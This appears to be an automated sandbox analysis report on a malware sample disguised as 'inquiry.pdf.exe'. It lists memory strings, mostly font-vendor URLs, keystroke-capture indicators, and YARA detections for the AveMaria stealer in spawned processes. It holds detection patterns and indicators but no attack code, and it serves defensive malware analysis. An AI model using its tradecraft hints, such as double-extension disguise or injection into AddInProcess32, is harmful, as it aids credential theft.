String found in binary or memory: http://www.fontbureau.comalsF5
Source: inquiry.pdf.exe, 00000000.00000003.298903445.000000000654F000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.306760136.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.298246614.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.312562087.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297641323.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297909896.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297186585.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.298549688.000000000654E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comav
Source: inquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comd
Source: inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comdv
Source: inquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comdva
Source: inquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268869519.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comm
Source: inquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268869519.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comony/O
Source: inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297641323.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297186585.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comrz
Source: inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comsief
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: inquiry.pdf.exe, 00000000.00000003.261532259.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261663692.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261323232.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: inquiry.pdf.exe, 00000000.00000003.261291352.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn&
Source: inquiry.pdf.exe, 00000000.00000003.261470904.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261541124.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261568725.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261532259.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: inquiry.pdf.exe, 00000000.00000003.261323232.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn4j4
Source: inquiry.pdf.exe, 00000000.00000003.261220547.0000000006521000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnQ
Source: inquiry.pdf.exe, 00000000.00000003.261348606.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnT
Source: inquiry.pdf.exe, 00000000.00000003.261348606.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnt-b
Source: inquiry.pdf.exe, 00000000.00000003.274291319.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: inquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: inquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265844488.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265956637.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/6
Source: inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/O
Source: inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y
Source: inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0=
Source: inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0f
Source: inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: inquiry.pdf.exe, 00000000.00000003.263345727.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/k-u
Source: inquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263345727.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/nyg
Source: inquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265844488.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265956637.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/s-e
Source: inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ueT
Source: inquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/v
Source: inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/vad
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261663692.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: inquiry.pdf.exe, 00000000.00000003.261927166.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cno.
Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: inquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: inquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: unknown DNS traffic detected: queries for: www.google.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49705 version: TLS 1.2
Creates a DirectInput object (often for capturing keystrokes)
Source: inquiry.pdf.exe, 00000000.00000002.313574266.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Installs a raw input device (often for capturing keystrokes)
Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GetRawInputData

E-Banking Fraud
barindex
Yara detected AveMaria stealer
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
